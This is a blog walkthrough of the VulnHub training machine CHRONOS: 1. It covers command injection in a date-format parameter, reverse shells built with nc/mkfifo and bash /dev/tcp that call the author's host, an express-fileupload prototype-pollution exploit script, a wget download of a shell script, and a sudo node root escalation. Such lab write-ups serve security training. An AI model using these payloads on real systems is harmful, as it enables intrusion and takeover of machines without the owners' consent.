---
layout: post
title:  "Vulnhub: CHRONOS: 1"
date:   2021-08-15 17:00:00 +1000
category: hacking
---

This is [CHRONOS: 1](https://www.vulnhub.com/entry/chronos-1,735/) from VulnHub. 

It's rated Medium, it's by [AL1ENUM](https://www.vulnhub.com/author/al1enum,745/) and it's very good, so give it a go.

## Ports
SSH and two HTTP ports: 80 and 8000. 

## HTTP
At the main website, we have a page displaying the date and time. Looking at Burpsuite, we can see it makes a request to the other port:

``
OPTIONS /date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL HTTP/1.1
``

The encoded string is base 58, and decodes to:

``
'+Today is %A, %B %d, %Y %H:%M:%S.'
``

If we make a GET request with the same parameter, i.e.

``
GET /date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL HTTP/1.1
``

we get this response

``
Today is Sunday, August 15, 2021 04:31:39.
``

We can see that the 'Today is' part comes from our submitted strings, and the rest is filled in by the server. Reading the man pages shows that the **date** binary produces this sort of output. In fact, a similar command produces this output:

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/chronos]
└─# date '+Something is %F, %F %F, %Y %H:%M:%S'                                           
Something is 2021-08-15, 2021-08-15 2021-08-15, 2021 01:08:45
{% endhighlight %}

So it looks like the command is being passed directly to **date**. Testing a command injection locally:

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/chronos]
└─# date '+Something is %F, %F %F, %Y %H:%M:%S';id
Something is 2021-08-15, 2021-08-15 2021-08-15, 2021 01:09:01
uid=0(root) gid=0(root) groups=0(root),142(kaboxer)
{% endhighlight %}

Hopefully this will work. I try a ping first, and it does work. Next I try a reverse shell. The simplest bash revshell won't work, but another will:

{% highlight shell %}
GET /date?format=6RtvYvanV3nT5HFqNKoSMqkTfe1waFA8kjKVHiFLr6ut33nCCH3aGb948oWpFytf1R5g6oMpV9pTGQHTaLsSUCpeSTbFanYJyHyWFJxnMBWKkHikCWG62M1BQPijsfYDeWtTvrgKteGHrA3Dptff4ycfFTbrRE11SQgm HTTP/1.1
{% endhighlight %}

This decodes to:

``
'+Something is %F, %F %F, %Y %H:%M:%S.';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.210 1234 >/tmp/f
``

And we are on the box:

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/chronos]
└─# nc -nvlp 1234                                                                                           
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.85] 36584
/bin/sh: 0: cant access tty; job control turned off
$ id;hostname;date
uid=33(www-data) gid=33(www-data) groups=33(www-data)
chronos
Sun Aug 15 05:12:00 UTC 2021
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@chronos:/opt/chronos$ pwd
pwd
/opt/chronos
www-data@chronos:/opt/chronos$
{% endhighlight %}

We don't have to look far for the next step:

{% highlight shell %}
www-data@chronos:/opt/chronos$ ls -lash /opt
ls -lash /opt
total 16K
4.0K drwxr-xr-x  4 root     root     4.0K Jul 30 07:50 .
4.0K drwxr-xr-x 23 root     root     4.0K Aug 11 10:35 ..
4.0K drwxr-xr-x  3 www-data www-data 4.0K Aug  3 20:11 chronos
4.0K drwxr-xr-x  4 root     root     4.0K Aug  3 19:40 chronos-v2
{% endhighlight %}

We have a chronos-v2. If we look inside we can find server.js, and find out that it is running internally:

{% highlight shell %}
www-data@chronos:/opt/chronos-v2/backend$ cat server.js
cat server.js
const express = require('express');
const fileupload = require("express-fileupload");
const http = require('http')

const app = express();

app.use(fileupload({ parseNested: true }));

app.set('view engine', 'ejs');
app.set('views', "/opt/chronos-v2/frontend/pages");

app.get('/', (req, res) => {
   res.render('index')
});

const server = http.Server(app);
const addr = "127.0.0.1"
const port = 8080;
server.listen(port, addr, () => {
   console.log('Server listening on ' + addr + ' port ' + port);
});www-data@chronos:/opt/chronos-v2/backend$ telnet localhost 8080
telnet localhost 8080
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
GET / HTTP/1.0


HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 151
ETag: W/"97-GhTu5wBiPgv2fNmGhgfZeXKNNT8"
Date: Sun, 15 Aug 2021 06:17:31 GMT
Connection: close

<!DOCTYPE html>
<html>
    <head>
        <title>Chronos - Version 2</title>
    </head>
    <body>
        <h1>Coming Soon...</h1>
    </body>
</html>Connection closed by foreign host.
www-data@chronos:
{% endhighlight %}

So, what can we do with this? We have an interesting entry:

>const fileupload = require("express-fileupload");

Perhaps there is a file upload we can take advantage of? Looking at the pages inside the webapp, it's clear that there is no uploading implemented - there is a just an index page. If we look around, we can find this:

{% highlight shell %}
www-data@chronos:/opt/chronos-v2/backend$ cat package-lock.json
cat package-lock.json
# trimmed for brevity
    "node_modules/express-fileupload": {
      "version": "1.1.7-alpha.3",
      "resolved": "https://registry.npmjs.org/express-fileupload/-/express-fileupload-1.1.7-alpha.3.tgz",
      "integrity": "sha512-2YRJQqjgfFcYiMr8inico+UQ0UsxuOUyO9wkWkx+vjsEcUI7c1ae38Nv5NKdGjHqL5+J01P6StT9mjZTI7Qzjg==",
      "deprecated": "Please upgrade express-fileupload to version 1.1.10+ due to a security vulnerability with the parseNested option",
      "dependencies": {
        "busboy": "^0.3.1"
      },
      "engines": {
        "node": ">=8.0.0"
      }
    },
{% endhighlight %}

What's that about? Google is our friend, and leads us to [this](https://blog.p6.is/Real-World-JS-1/) blog post about the vulnerability and some code on how to get a shell. This is the supplied code:

{% highlight python %}
import requests

cmd = 'bash -c "bash -i &> /dev/tcp/p6.is/8888 0>&1"'

# pollute
requests.post('http://p6.is:7777', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

# execute command
requests.get('http://p6.is:7777')
{% endhighlight %}

We only need to change a few bits and we can use it. Here's my version:

{% highlight python %}
import requests

cmd = 'bash -c "bash -i &> /dev/tcp/192.168.1.210/1237 0>&1"'

# pollute
requests.post('http://localhost:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

# execute command
requests.get('http://localhost:8080')
{% endhighlight %}

We can upload and execute that to get a new shell. Upload and execute:

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/chronos]
└─# nc -nvlp 1234                                           
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.85] 47782
/bin/sh: 0: cant access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@chronos:/opt/chronos$ cd /dev/shm
cd /dev/shm
www-data@chronos:/dev/shm$ wget http://192.168.1.210:9090/sheller.py
wget http://192.168.1.210:9090/sheller.py
--2021-08-15 09:22:55--  http://192.168.1.210:9090/sheller.py
Connecting to 192.168.1.210:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 323 [text/x-python]
Saving to: ‘sheller.py’

sheller.py          100%[===================>]     323  --.-KB/s    in 0s      

2021-08-15 09:22:55 (7.02 MB/s) - ‘sheller.py’ saved [323/323]

www-data@chronos:/dev/shm$ python3 ./sheller.py
python3 ./sheller.py
www-data@chronos:/dev/shm$
{% endhighlight %}

Host and then listen:

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/chronos]
└─# updog
[+] Serving /opt/vulnhub/chronos...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)
192.168.1.85 - - [15/Aug/2021 05:22:54] "GET /sheller.py HTTP/1.1" 200 -
^C
[!] Exiting!
┌──(root💀kali)-[/opt/vulnhub/chronos]
└─# nc -nvlp 1237                                                                                 
listening on [any] 1237 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.85] 53990
bash: cannot set terminal process group (789): Inappropriate ioctl for device
bash: no job control in this shell
imera@chronos:/opt/chronos-v2/backend$
{% endhighlight %}

## GTFO
Root is [straightforward](https://gtfobins.github.io/gtfobins/node/#sudo), but makes sense in the context of the box:

{% highlight shell %}
imera@chronos:/opt/chronos-v2/backend$ sudo -l
sudo -l
Matching Defaults entries for imera on chronos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User imera may run the following commands on chronos:
    (ALL) NOPASSWD: /usr/local/bin/npm *
    (ALL) NOPASSWD: /usr/local/bin/node *
imera@chronos:/opt/chronos-v2/backend$ sudo -u root /usr/local/bin/node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'
<child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'
python3 -c 'import pty;pty.spawn("/bin/bash");'
root@chronos:/opt/chronos-v2/backend# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
chronos
Sun Aug 15 09:25:26 UTC 2021
root@chronos:/opt/chronos-v2/backend#
{% endhighlight %}

This was a good one, I enjoyed it a lot :)
